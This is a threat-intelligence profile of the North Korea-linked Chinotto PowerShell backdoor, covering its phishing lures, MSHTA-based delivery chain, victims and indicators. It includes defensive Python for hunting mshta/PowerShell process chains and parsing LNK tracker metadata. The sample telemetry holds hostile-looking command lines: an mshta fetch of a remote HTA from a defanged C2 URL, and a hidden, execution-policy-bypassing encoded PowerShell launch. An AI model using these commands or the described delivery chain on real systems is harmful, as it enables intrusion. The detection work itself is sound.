Mallory
Malware · Used by 3 actors

Chinotto

Chinotto is a PowerShell-based backdoor malware family associated with North Korea-linked APT37/ScarCruft (also tracked as Reaper, Ruby Sleet, and Velvet Chollima) and the ChinopuNK sub-cluster. It has been used for espionage, surveillance, and data theft, including campaigns targeting journalists, human rights activists, North Korean defectors, media organizations, high-profile academics, and South Korea-related policy, research, and defense-linked targets. Reported capabilities include command execution, file transfer, exfiltration of system information, and persistence via the registry and scheduled tasks. Reporting also states Chinotto has supported attacks against both Windows and Android systems.

Observed delivery vectors include spear-phishing and malicious archives containing CHM help files, LNK shortcut files, macro-enabled Word documents, HWP documents with embedded OLE objects, and a malicious Excel XLL add-in. In multiple documented chains, these lures execute MSHTA to retrieve an HTA payload containing the Chinotto PowerShell backdoor. Specific examples in the reporting include CHM files delivered alongside password-protected decoy documents, LNK files with double extensions such as "html.lnk" and "pdf.lnk", Word macros that fetch the same HTA payload, HWP-embedded PE loaders that invoke MSHTA, and an XLL uploaded to GitHub on 2023-03-15 that dropped a decoy XLS and downloaded an HTA from hxxp://yangak[.]com/data/cheditor4/pro/temp/5.html. More recent reporting describes ZIP archives containing LNK or CHM files that drop CHILLYCHINO or Chinotto; the backdoor then contacts its C2 server to retrieve a next-stage payload that launches FadeStealer. Across these chains the common choke point is the mshta.exe invocation itself, which makes process-creation telemetry for mshta.exe, its parent process and its child processes the most reliable place to hunt, regardless of which lure format was used.
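The lure-to-MSHTA-to-PowerShell chain described above is what an analyst would hunt for in process-creation telemetry. The following is an added example, not code from the cited reports or from the Mallory page: three hunting rules run over constructed Sysmon-style events (Event ID 1 fields). The parent-process list, process IDs, image paths and command lines are assumptions; the defanged URL is the one quoted in the reporting above, and the regex accepts both armed and defanged forms so the sample never needs to be re-armed.

```python
"""Constructed Sysmon-style process-creation events and three hunting rules
for the lure -> mshta.exe -> HTA -> PowerShell chain.  Example code, not
from the vendor reports; tune LURE_PARENTS to your estate."""
import re

# Parents from which mshta.exe should almost never be launched in normal use:
# the CHM viewer, Office/HWP document handlers, and Explorer (a double-clicked
# LNK).  Hypothetical list, assumed for this example.
LURE_PARENTS = {"hh.exe", "winword.exe", "excel.exe", "hwp.exe", "explorer.exe"}

# Matches http://, https:// and the defanged hxxp:// / hxxps:// forms so the
# rule works on raw telemetry and on defanged threat-intel exports alike.
URL_RE = re.compile(r"\bh(?:tt|xx)ps?://", re.IGNORECASE)


def _base(path):
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev):
    """Return the names of every rule an event trips (empty list if none)."""
    image, parent, cmd = _base(ev["Image"]), _base(ev["ParentImage"]), ev["CommandLine"]
    hits = []
    if image == "mshta.exe":
        if URL_RE.search(cmd):
            hits.append("mshta_remote_hta")      # mshta fetching an HTA over HTTP(S)
        if parent in LURE_PARENTS:
            hits.append("mshta_from_lure")       # CHM/Office/HWP/LNK handler spawning mshta
    if image in {"powershell.exe", "pwsh.exe"} and parent == "mshta.exe":
        hits.append("powershell_from_mshta")     # HTA handing off to the PowerShell backdoor
    return hits


def triage(events):
    """Map ProcessId -> rule names for every event worth an analyst's attention."""
    return {ev["ProcessId"]: hits for ev in events if (hits := classify(ev))}


# Constructed sample telemetry (not real logs).  The encoded command is a stub
# that decodes to "IEX" only; the HTA URL is the defanged one from the reporting.
SAMPLE_EVENTS = [
    {"ProcessId": 4100, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\hh.exe",
     "CommandLine": r'"C:\Windows\hh.exe" C:\Users\u\Downloads\notice.chm'},
    {"ProcessId": 4112, "ParentImage": r"C:\Windows\hh.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta hxxp://yangak[.]com/data/cheditor4/pro/temp/5.html"},
    {"ProcessId": 4120, "ParentImage": r"C:\Windows\System32\mshta.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -ep bypass -enc SQBFAFgA"},
    # Benign: an admin opening a local HTA tool from a console.
    {"ProcessId": 5000, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe C:\Tools\inventory.hta"},
]

if __name__ == "__main__":
    for pid, rules in triage(SAMPLE_EVENTS).items():
        print(pid, rules)
```

On the sample, the CHM-launched mshta.exe (PID 4112) trips both mshta rules and the PowerShell it spawns (PID 4120) trips the third; the console-launched local HTA trips nothing. The mshta_from_lure rule is the cheapest of the three to run at scale because it needs no command-line parsing, and the same parent-child logic applies directly to EDR process trees.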

Chinotto remains one of the core malware families historically used by APT37. It has been explicitly described as a highly customizable backdoor and as part of the group's "Chinotto" cluster, distinct from its RokRat operations. Artifacts and indicators tied to Chinotto delivery in the reporting include the XLL MD5 82d58de096f53e4df84d6f67975a8dda, HWP MD5 a4706737645582e1b5f71a462dd01140, extracted loader MD5 d8c9a357da3297e7ccb2ed3a5761e59f, dropped decoy path C:\programdata\20230315_SejeongSupport.xls, LNK metadata showing MAC address 00:0c:29:41:1b:1c, and the filename HqcUpdate.exe, identified in one report as a final information-stealing payload referred to as Chinotto. Note that the 00:0c:29 prefix of that MAC address is a VMware OUI, so it identifies the virtual machine on which the shortcut was built rather than physical hardware; it is useful for clustering samples from the same build environment, not as a network block indicator.
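The LNK MAC address listed above comes from the shortcut's TrackerDataBlock (MS-SHLLINK section 2.5.10), where Windows stores version-1 GUIDs whose node field is the MAC of the machine on which the shortcut was created and whose time field is its creation timestamp. The following is an added example, not code from the cited reports or from Mallory, that parses that block out of a .lnk file. The sample shortcut, the machine name "win-test01" and the creation date are constructed for the example; only the MAC is taken from the indicator above.

```python
"""Extract the TrackerDataBlock from a Windows shortcut (.lnk) and recover the
MAC address and timestamp embedded in its version-1 object GUIDs.  Example
code, not from the vendor reports."""
import struct
import uuid
from datetime import datetime, timedelta, timezone

LNK_HEADER_SIZE = 0x4C
TRACKER_SIGNATURE = 0xA0000003
# LinkFlags bits that place variable-length structures before the extra data.
HAS_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_FLAGS = (0x04, 0x08, 0x10, 0x20, 0x40)  # Name, RelativePath, WorkingDir, Arguments, IconLocation
UUID_EPOCH = datetime(1582, 10, 15, tzinfo=timezone.utc)
UNIX_TO_UUID_100NS = 0x01B21DD213814000      # 1582-10-15 -> 1970-01-01 in 100 ns ticks


def _extra_data_offset(data):
    """Walk past the header, IDList, LinkInfo and StringData to the first extra block."""
    if len(data) < LNK_HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE:
        raise ValueError("not a shell link header")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_ID_LIST:
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:
        pos += struct.unpack_from("<I", data, pos)[0]
    width = 2 if flags & IS_UNICODE else 1
    for bit in STRING_FLAGS:
        if flags & bit:
            pos += 2 + width * struct.unpack_from("<H", data, pos)[0]
    return pos


def _v1_guid_info(raw16):
    """Return (mac, created) for a version-1 GUID, or (None, None) for any other version."""
    g = uuid.UUID(bytes_le=raw16)
    if g.version != 1:
        return None, None
    mac = ":".join(f"{(g.node >> s) & 0xFF:02x}" for s in range(40, -1, -8))
    return mac, UUID_EPOCH + timedelta(microseconds=g.time // 10)


def parse_tracker(data):
    """Return the TrackerDataBlock fields of a .lnk as a dict, or None if absent."""
    pos = _extra_data_offset(data)
    while pos + 8 <= len(data):
        size, sig = struct.unpack_from("<II", data, pos)
        if size < 4:                          # TerminalBlock ends the extra data
            break
        if sig == TRACKER_SIGNATURE and size >= 0x60:
            machine = data[pos + 16:pos + 32].split(b"\0", 1)[0].decode("ascii", "replace")
            volume_mac, _ = _v1_guid_info(data[pos + 32:pos + 48])      # Droid: volume id
            file_mac, created = _v1_guid_info(data[pos + 48:pos + 64])   # Droid: file object id
            birth_mac, born = _v1_guid_info(data[pos + 80:pos + 96])     # DroidBirth: file object id
            return {"machine_id": machine, "volume_mac": volume_mac, "file_mac": file_mac,
                    "file_created": created, "birth_mac": birth_mac, "birth_created": born}
        pos += size
    return None


def build_sample_lnk(mac, machine_id, created):
    """Constructed minimal .lnk: zeroed header (no IDList/LinkInfo/strings), one
    TrackerDataBlock, then the TerminalBlock.  Not a real sample."""
    header = struct.pack("<I", LNK_HEADER_SIZE) + uuid.UUID("00021401-0000-0000-c000-000000000046").bytes_le
    header += b"\0" * (LNK_HEADER_SIZE - len(header))   # LinkFlags = 0, everything else zero
    ticks = int(created.timestamp()) * 10_000_000 + UNIX_TO_UUID_100NS
    file_guid = uuid.UUID(fields=(ticks & 0xFFFFFFFF, (ticks >> 32) & 0xFFFF,
                                  ((ticks >> 48) & 0x0FFF) | 0x1000,   # version 1
                                  0x80, 0x01, int(mac.replace(":", ""), 16)))
    volume_guid = uuid.UUID("1f2e3d4c-5b6a-4798-8c1d-0a0b0c0d0e0f")   # arbitrary v4, as Windows uses
    tracker = struct.pack("<IIII", 0x60, TRACKER_SIGNATURE, 0x58, 0)
    tracker += machine_id.encode("ascii").ljust(16, b"\0")
    tracker += (volume_guid.bytes_le + file_guid.bytes_le) * 2        # Droid, then DroidBirth
    return header + tracker + struct.pack("<I", 0)


SAMPLE_CREATED = datetime(2023, 3, 15, tzinfo=timezone.utc)           # constructed date
SAMPLE_LNK = build_sample_lnk("00:0c:29:41:1b:1c", "win-test01", SAMPLE_CREATED)

if __name__ == "__main__":
    for k, v in parse_tracker(SAMPLE_LNK).items():
        print(f"{k:14} {v}")
```

On a real file, replace SAMPLE_LNK with open(path, "rb").read(). The volume GUID is normally version 4 and yields no MAC, which the parser reports as None rather than misreading random bytes as an address; the file object GUID is the one that carries the builder's NIC and the creation time. A match on the DroidBirth pair across otherwise unrelated shortcuts is a strong sign they were produced on the same machine.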


THREAT ACTORS

Groups observed using it

3 distinct threat actors attributed by public researchers.
APT37

It is worth noting that this isn’t the first time APT37 has been linked to malware campaigns targeting journalists, with the most recent being a November 2021 report employing the highly-customizable “Chinotto” backdoor.

via BleepingComputer (bleepingcomputer.com)
TA-RedAnt

“Chinotto: PowerShell Backdoor (File Transfer, Command Execution, Registry and Scheduled Tasks)”

via AhnLab ASEC blog (asec.ahnlab.com)
Kimsuky

For years, the group relied on a malware family called Chinotto to carry out espionage and data theft.

via Cyber Security News (cybersecuritynews.com)
MITRE ATT&CK

Techniques & procedures

1 distinct technique documented for this family, organized by ATT&CK tactic.

Initial Access

1 technique
T1566 Phishing (evidence: 1)

The malware is distributed through a phishing attack... The phishing emails originated from the account of the former director of South Korea’s National Intelligence Service (NIS), who APT37 previously compromised.

INDICATORS OF COMPROMISE

IOCs tracked for this family

14 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
Network (14 tracked): IPs, domains, and DNS infrastructure linked to this family. The six entries shown on the public page are all of type domain, with their values withheld; each has a latest sighting of 24 days ago.